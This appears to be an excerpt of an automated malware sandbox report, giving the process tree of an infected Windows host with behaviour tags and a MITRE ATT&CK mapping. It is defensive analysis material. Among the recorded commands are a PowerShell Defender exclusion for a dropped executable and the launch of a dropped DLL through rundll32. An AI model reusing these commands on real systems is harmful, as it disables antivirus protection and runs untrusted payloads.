C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\f8eb4a45-bc0f-4b56-9d63-01447b3b5fa4\test.bat"3⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3260 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1368
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\D57E.exe" -Force2⤵PID:6228
-
-
C:\Users\Admin\AppData\Local\Temp\D57E.exeC:\Users\Admin\AppData\Local\Temp\D57E.exe2⤵PID:7568
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 3152 -ip 31521⤵PID:3492
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 1368 -ip 13681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6428
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1968
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 8762⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1752
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:4060
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:3912
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
PID:4540
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6396
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:5244
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1968 -ip 19681⤵PID:4564
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:816
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7804
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:8128
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:796
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:1936
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5680
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
PID:2960 -
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
- Suspicious use of SetWindowsHookEx
PID:5992
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:888
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 5872 -ip 58721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:4812
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵PID:3692
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2560 -ip 25601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6204
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:7000 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:2844 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5420
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2844 -ip 28441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7756
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵PID:6196
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5536 -ip 55361⤵PID:7352
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:1900
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
Disabling Security Tools
4Install Root Certificate
1Modify Registry
6Virtualization/Sandbox Evasion
1Web Service
1